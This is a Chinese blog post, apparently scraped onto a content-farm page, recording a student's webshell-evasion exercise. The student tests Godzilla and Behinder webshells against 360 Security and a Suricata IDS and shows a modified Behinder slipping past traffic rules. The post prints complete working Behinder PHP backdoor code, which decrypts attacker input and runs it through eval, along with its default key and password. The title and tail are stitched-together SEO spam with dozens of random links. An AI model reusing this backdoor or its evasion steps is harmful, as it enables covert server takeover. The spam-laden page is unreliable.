当前位置: 首页 > wzjs >正文

在哪个网站上可以学做衣服深圳app建设公司

在哪个网站上可以学做衣服,深圳app建设公司,无经验做网站,水处理网站模板一、前言 先借用免杀工具来了解webshell上传和操作执行会遭到查杀的几个阶段,使用windows7 x64(360安全卫士13)来作为测试机。主要内容参考小迪安全课程:第144天:免杀对抗-Webshell篇&静态查杀&行为拦截&…

一、前言

先借用免杀工具来了解webshell上传和操作执行会遭到查杀的几个阶段,使用windows7 x64(360安全卫士13)来作为测试机。主要内容参考小迪安全课程:第144天:免杀对抗-Webshell篇&静态查杀&行为拦截&流量监控&代码混淆&内存加载&工具魔改_哔哩哔哩_bilibili

二、工具

用到的主要是one-fox集成工具箱,其中内置的webshell工具:冰蝎、哥斯拉、蚁剑

免杀工具是:XG拟态WEB免杀工具

三、 学习部分

首先开启windows7的web服务

1.Godzilla马(表面代码)

从工具箱中生成一个木马上传到windows的WWW目录下

立刻会被360检测到,立马被查杀的,这里应该称为表面代码层的查杀

2.Godzilla马初步免杀(操作行为)

对上述木马放入XG拟态中进行免杀

发现此时不会被查杀掉,用哥斯拉连接一下,但当尝试危险操作

 

发现进行危险操作会被监测到,就是操作行为被检测到了

3.冰蝎连接(工具指纹)

 上传一个冰蝎马

<?php
@error_reporting(0);
session_start();$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond$_SESSION['k']=$key;session_write_close();$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64_"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i++) {$post[$i] = $post[$i]^$key[$i+1&15]; }}else{$post=openssl_decrypt($post, "AES128", $key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p."");}}@call_user_func(new C(),$params);
?>

用冰蝎进行连接

此时需要使用suricata工具来监测,这里我是用kali搭建的suricata监听,然后导入了github上的规则库:al0ne/suricata-rules: Suricata IDS rules 用来检测红队渗透/恶意行为等,支持检测CobaltStrike/MSF/Empire/DNS隧道/Weevely/菜刀/冰蝎/挖矿/反弹shell/ICMP隧道等

 

将冰蝎的特征导入suricata的规则库中:/etc/suricata/rules

suricata开始监听冰蝎的流量:

suricata -c /etc/suricata/suricata.yaml -i eth0 -s /etc/suricata/rules/Behinder3.rules

在冰蝎webshell中进行一些操作

 

查看suricata的fast.log日志

发现成功监听到了冰蝎的流量

 4.冰蝎魔改(绕过对流量的监测)

用冰蝎魔改版来上传shell和执行,先上传冰蝎魔改版shell,然后执行操作

 此时再次看suricata的日志记录

发现此时不会发现冰蝎魔改版的流量 

四、总结

第一部分内容主要是先熟悉一下一个大概的免杀流程以及webshell可能会被监测到的三个层面:表面代码层(混淆)、操作行为层(魔改)、工具指纹层(魔改),之后会跟着小迪安全学习后续内容。

 

 

 

 


文章转载自:

http://p2UKGIoD.sqtsL.cn
http://YpIb4pEV.sqtsL.cn
http://BdvdCxx9.sqtsL.cn
http://mE9Yffik.sqtsL.cn
http://tywRDYsn.sqtsL.cn
http://0DhgbvDO.sqtsL.cn
http://dshW29TC.sqtsL.cn
http://N9M18HTY.sqtsL.cn
http://nih0SxXW.sqtsL.cn
http://WdcwzgkC.sqtsL.cn
http://8gaJpBeH.sqtsL.cn
http://Yajtoid5.sqtsL.cn
http://a3faX44Z.sqtsL.cn
http://UXMHX9wx.sqtsL.cn
http://vKjzMu2y.sqtsL.cn
http://XWHU5hDj.sqtsL.cn
http://mQPxepb2.sqtsL.cn
http://bXZ3YEtr.sqtsL.cn
http://VvCIawlJ.sqtsL.cn
http://sRI6oSAX.sqtsL.cn
http://J8AbceyC.sqtsL.cn
http://i7JkUjly.sqtsL.cn
http://so1zfVlk.sqtsL.cn
http://DT5UjKaB.sqtsL.cn
http://1NDjsvi5.sqtsL.cn
http://jGyNHBRh.sqtsL.cn
http://5YXM8PdS.sqtsL.cn
http://81WL4D30.sqtsL.cn
http://5PqwSHt1.sqtsL.cn
http://soLhwMPR.sqtsL.cn
http://www.dtcms.com/wzjs/709625.html

相关文章:

  • 做ppt的模板的网站企业网站备案需要什么资料
  • 赣州网站建设公司蜘蛛抓取网站模块原理
  • 微商城网站开发制作网络营销与传统营销的区别
  • 汽车网站建设公司php 企业 网站
  • 电影采集网站怎么做seo网站推广广告
  • 常见的网站空间服务商淄博做网站市场
  • 虾皮购物网站怎么做wordpress5.2自动保存
  • 网站的备案在哪备案吗全国开发一个网站需要多少钱
  • 广州网站建设制作上海公司买新能源车需要什么条件
  • 纯静态网站索引怎么做微网站 获取手机号
  • 网站开发工作室挣钱吗wordpress头像大小不一样
  • 百度怎么自己做网站吗产品开发流程梳理
  • 网页设计与制作教程教科书关键词整站优化公司
  • 太原制作网站的公司gif图标网站
  • 药房网站模板100款夜间必备软件app
  • 网站设计面试问题电子设计全国网站建设
  • 松江品牌网站建设深圳平面广告设计公司
  • 做一个一般的网站需要多少钱建立网站的方法
  • 阜城网站建设价格网站界面友好
  • 建设银行网站怎么修改手机号码吗网站的基本组成部分有哪些内容
  • 网站改版原因物流网站建设策划书的总结
  • 网站建设的项目描述一起作做业网站
  • 企业网站建设的劣势做一个公司官网需要多少钱
  • 厂家网站怎么做网站建设上传服务器步骤
  • 济南做门户网站开发公司怎样做婚恋网站
  • 新站秒收录接口电影网站规划
  • 网站建设开发的流程沂源网站
  • 餐饮网站建设方案书wordpress广告代码在哪里
  • 加快网站平台建设网站增加聊天
  • wordpress 移动 建站游戏开发是什么